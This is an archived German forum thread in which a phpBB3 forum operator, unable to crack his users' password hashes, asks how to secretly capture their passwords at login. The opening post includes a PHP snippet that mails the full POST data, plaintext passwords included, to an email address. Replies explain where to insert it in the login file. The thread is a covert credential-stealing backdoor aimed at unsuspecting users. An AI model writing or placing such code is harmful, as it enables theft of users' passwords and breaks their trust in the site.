PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : phpBB3 passwörter abfangen



manzle
06.10.2008, 20:39
hallo leute...
nach einer anfrage im hash thread einige hashes meines forums zu knacken wurde ich darauf hingewiesen, dass das nahezu unmöglich ist oder nur unter enormem zeitaufwand.

als alternative hat mir ein netter user ein code schnipsel geposted mit welchem ich die passwörter der user beim einloggen abfangen kann:


<?

//Checken ob Post Daten enthällt
if(!empty($_POST))
//Wenn ja, dann eine Mail an deine@mail.com senden mit dem kompletten Postarray
mail('deine@mail.com'', 'Geloggte Benutzerdaten', 'Follgender Post-String wurde geloggt: '.implode('&', $_POST));

?>

erstmal wird das so funktionieren und wenn ja, wo müsste ich den code einbauen. ich tippe mal auf die "ucp.php", da dort der login abgefragt wird.
nun stellt sich mir aber weiter die frage wo genau in dieser datei müsste der code stehen?
hab den schnipsel mal an den anfang, ans ende der datei gesetzt...hat aber leider nicht funktioniert :(


danke schonmal an euch!

-=Player=-
06.10.2008, 21:27
such einfach den query der zum erstellen des datensatzes dient und füg dein code schnippsel darüber ein.

manzle
06.10.2008, 21:37
wie würde dieser query z.b. aussehen? bin mit php noch nicht so vertraut.

ich könnte dir die datei auch schicken :)
oder kennt sich jemand mit phpbb soweit aus, dass er mir sagen kann ob die ucp.php +berhaupt die richtige datei ist :P

DJ-2K
06.10.2008, 22:30
Sh!t warst du das, dem ich das noch schicken wollte?
Naja bau den Code selber ein. Modifizier ihn so, dass er auf dich passt und pack ihn dann ganz oben in die Login-Datei rein.
(Nach dem <? oder <?php)

manzle
07.10.2008, 13:00
jo das war ich ;) wollte dich nur nicht weiter nerven.
bin davon ausgegangen du kannst mir bei phpbb auch nicht weiterhelfen.

ich test es dann jetzt mal an der von dir genannten stelle

#edit:
also hab den code mal am anfang eingefügt und jetzt funzt aber weder das ein- noch das ausloggen :(